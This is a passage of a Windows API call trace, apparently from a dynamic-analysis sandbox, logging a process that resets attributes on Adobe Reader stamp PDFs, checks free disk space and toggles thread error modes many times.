10.0\\Reader\\plug_ins\\Annotations\\Stamps\\TUR\\Dynamic.pdf", dwFileAttributes=0x80) returned 1 [0110.527] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac | out: lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac) returned 1 [0110.532] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\TUR\\Faces.pdf", dwFileAttributes=0x80) returned 1 [0110.535] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac | out: lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac) returned 1 [0110.542] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\TUR\\Pointers.pdf", dwFileAttributes=0x80) returned 1 [0110.545] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac | out: lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac) returned 1 [0110.550] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\TUR\\SignHere.pdf", dwFileAttributes=0x80) returned 1 [0110.553] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac | out: lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac) returned 1 [0110.563] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\TUR\\Standard.pdf", dwFileAttributes=0x80) returned 1 [0110.566] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac | out: lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac) returned 1 [0110.576] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\TUR\\StandardBusiness.pdf", dwFileAttributes=0x80) returned 1 [0110.580] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0110.580] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0110.580] CoTaskMemFree (pv=0x508980) [0110.580] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0110.583] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac | out: lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac) returned 1 [0110.593] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\UKR\\Dynamic.pdf", dwFileAttributes=0x80) returned 1 [0110.596] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac | out: lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac) returned 1 [0110.601] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\UKR\\Faces.pdf", dwFileAttributes=0x80) returned 1 [0110.604] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac | out: lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac) returned 1 [0110.611] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\UKR\\Pointers.pdf", dwFileAttributes=0x80) returned 1 [0110.614] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac | out: lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac) returned 1 [0110.620] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\UKR\\SignHere.pdf", dwFileAttributes=0x80) returned 1 [0110.623] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac | out: lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac) returned 1 [0110.632] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\UKR\\Standard.pdf", dwFileAttributes=0x80) returned 1 [0110.636] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac | out: lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac) returned 1 [0110.657] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aef1c) returned 1 [0110.658] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aef18) returned 1 [0110.658] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aef0c) returned 1 [0110.658] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aef08) returned 1 [0110.659] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aef1c) returned 1 [0110.660] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aef18) returned 1 [0110.660] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aef0c) returned 1 [0110.660] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aef08) returned 1 [0110.661] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aef1c) returned 1 [0110.661] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aef18) returned 1 [0110.661] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aef0c) returned 1 [0110.661] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aef08) returned 1 [0110.662] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aef1c) returned 1 [0110.662] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aef18) returned 1 [0110.662] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aef0c) returned 1 [0110.663] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aef08) returned 1 [0110.663] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aef1c) returned 1 [0110.663] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aef18) returned 1 [0110.664] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aef0c) returned 1 [0110.664] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aef08) returned 1 [0110.664] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aef1c) returned 1 [0110.664] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aef18) returned 1 [0110.665] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aef0c) returned 1 [0110.665] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aef08) returned 1 [0110.666] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aef1c) returned 1 [0110.666] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aef18) returned 1 [0110.667] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aef0c) returned 1 [0110.667] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aef08) returned 1 [0110.668] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aef1c) returned 1 [0110.668] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aef18) returned 1 [0110.668] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aef0c) returned 1 [0110.669] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aef08) returned 1 [0110.670] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aef1c) returned 1 [0110.670] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aef18) returned 1 [0110.670] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aef0c) returned 1 [0110.670] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aef08) returned 1 [0110.672] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aef1c) returned 1 [0110.672] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aef18) returned 1 [0110.672] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aef0c) returned 1 [0110.672] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aef08) returned 1 [0110.673] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aef1c) returned 1 [0110.673] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aef18) returned 1 [0110.674] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aef0c) returned 1 [0110.674] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aef08) returned 1 [0110.675] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aef1c) returned 1 [0110.675] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aef18) returned 1 [0110.676] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aef0c) returned 1 [0110.676] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aef08) returned 1 [0110.677] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aef1c) returned 1 [0110.677] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aef18) returned 1 [0110.677] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aef0c) returned 1 [0110.678] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aef08) returned 1 [0110.679] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aef1c) returned 1 [0110.679] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aef18) returned 1 [0110.679] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aef0c) returned 1 [0110.679] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aef08) returned 1 [0110.680] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aef1c) returned 1 [0110.681] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aef18) returned 1 [0110.681] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aef0c) returned 1 [0110.681] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aef08) returned 1 [0110.682] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aef1c) returned 1 [0110.682] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aef18) returned 1 [0110.683] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aef0c) returned 1 [0110.683] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aef08) returned 1 [0110.684] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aef1c) returned 1 [0110.684] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aef18) returned 1 [0110.685] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aef0c) returned 1 [0110.685] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aef08) returned 1 [0110.686] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aef1c) returned 1 [0110.686] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aef18) returned 1 [0110.686] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aef0c) returned 1 [0110.686] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aef08) returned 1 [0110.688] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aef1c) returned 1 [0110.688] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aef18) returned 1 [0110.688] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aef0c) returned 1 [0110.688] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aef08) returned 1 [0110.690] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aef1c) returned 1 [0110.690] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aef18) returned 1 [0110.692] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aef0c) returned 1 [0110.692] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aef08) returned 1 [0110.693] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aef1c) returned 1 [0110.693] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aef18) returned 1 [0110.693] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aef0c) returned 1 [0110.693] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aef08) returned 1 [0110.695] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aef1c) returned 1 [0110.695] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aef18) returned 1 [0110.695] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aef0c) returned 1 [0110.695] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aef08) returned 1 [0110.696] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aef1c) returned 1 [0110.697] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aef18) returned 1 [0110.697] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aef0c) returned 1 [0110.697] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aef08) returned 1 [0110.698] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aef1c) returned 1 [0110.698] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aef18) returned 1 [0110.699] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aef0c) returned 1 [0110.699] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aef08) returned 1 [0110.710] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aef1c) returned 1 [0110.710] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aef18) returned 1 [0110.710] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aef0c) returned 1 [0110.711] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aef08) returned 1 [0110.712] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aef1c) returned 1 [0110.712] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aef18) returned 1 [0110.712] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aef0c) returned 1 [0110.712] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aef08) returned 1 [0110.713] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aef1c) returned 1 [0110.714] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aef18) returned 1 [0110.715] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aef0c) returned 1 [0110.715] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aef08) returned 1 [0110.717] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aef1c) returned 1 [0110.717] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aef18) returned 1 [0110.717] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aef0c) returned 1 [0110.717] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aef08) returned 1 [0110.718] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aef1c) returned 1 [0110.718] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aef18) returned 1 [0110.719] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aef0c) returned 1 [0110.719] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aef08) returned 1 [0110.720] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aef1c) returned 1 [0110.720] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aef18) returned 1 [0110.720] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aef24) returned 1 [0110.721] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aef20) returned 1 [0110.723] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af018) returned 1 [0110.723] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af014) returned 1 [0110.723] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af060) returned 1 [0110.724] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af05c) returned 1 [0110.724] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\UKR\\StandardBusiness.pdf", dwFileAttributes=0x80) returned 1 [0110.727] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af018) returned 1 [0110.728] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af014) returned 1 [0110.728] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aef48) returned 1 [0110.728] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aef44) returned 1 [0110.729] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0cc) returned 1 [0110.730] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af08c) returned 1 [0110.730] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af098) returned 1 [0110.730] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0110.730] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0110.731] CoTaskMemFree (pv=0x508980) [0110.731] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0110.731] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af15c) returned 1 [0110.734] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af11c) returned 1 [0110.734] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af128) returned 1 [0110.734] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af15c) returned 1 [0110.735] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af11c) returned 1 [0110.735] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af128) returned 1 [0110.735] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0110.735] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0110.736] CoTaskMemFree (pv=0x508980) [0110.736] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aebd8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0110.736] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af114) returned 1 [0110.740] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0d4) returned 1 [0110.741] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0e0) returned 1 [0110.745] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af114) returned 1 [0110.746] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0d4) returned 1 [0110.746] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0e0) returned 1 [0110.746] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0110.747] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0110.747] CoTaskMemFree (pv=0x508980) [0110.747] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aebd8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0110.747] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af114) returned 1 [0110.748] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0d4) returned 1 [0110.748] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0e0) returned 1 [0110.748] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af114) returned 1 [0110.748] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0d4) returned 1 [0110.748] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0e0) returned 1 [0110.749] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0110.749] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0110.749] CoTaskMemFree (pv=0x508980) [0110.749] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af114) returned 1 [0110.750] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0d4) returned 1 [0110.750] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0e0) returned 1 [0110.750] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af114) returned 1 [0110.750] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0d4) returned 1 [0110.750] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0e0) returned 1 [0110.750] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0110.750] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0110.750] CoTaskMemFree (pv=0x508980) [0110.750] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aebd8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0110.751] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af114) returned 1 [0110.752] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0d4) returned 1 [0110.752] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0e0) returned 1 [0110.752] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af114) returned 1 [0110.753] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0d4) returned 1 [0110.753] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0e0) returned 1 [0110.753] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0110.753] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0110.753] CoTaskMemFree (pv=0x508980) [0110.753] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aebd8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0110.753] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af114) returned 1 [0110.754] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0d4) returned 1 [0110.754] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0e0) returned 1 [0110.754] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af114) returned 1 [0110.754] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0d4) returned 1 [0110.755] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0e0) returned 1 [0110.755] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0110.755] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0110.755] CoTaskMemFree (pv=0x508980) [0110.755] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aebd8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0110.755] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af114) returned 1 [0110.756] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0d4) returned 1 [0110.756] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0e0) returned 1 [0110.756] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af114) returned 1 [0110.756] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0d4) returned 1 [0110.756] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0e0) returned 1 [0110.756] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0110.756] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0110.757] CoTaskMemFree (pv=0x508980) [0110.757] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aebd8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0110.757] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af114) returned 1 [0110.758] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0d4) returned 1 [0110.758] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0e0) returned 1 [0110.758] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af114) returned 1 [0110.758] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0d4) returned 1 [0110.758] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0e0) returned 1 [0110.758] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0110.758] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0110.758] CoTaskMemFree (pv=0x508980) [0110.759] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aebd8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0110.759] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af114) returned 1 [0110.760] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0d4) returned 1 [0110.760] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0e0) returned 1 [0110.760] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af114) returned 1 [0110.760] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0d4) returned 1 [0110.760] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0e0) returned 1 [0110.760] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0110.760] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0110.760] CoTaskMemFree (pv=0x508980) [0110.760] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aebd8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0110.761] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af114) returned 1 [0110.761] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0d4) returned 1 [0110.761] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0e0) returned 1 [0110.762] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af114) returned 1 [0110.762] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0d4) returned 1 [0110.762] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0e0) returned 1 [0110.762] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0110.762] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0110.762] 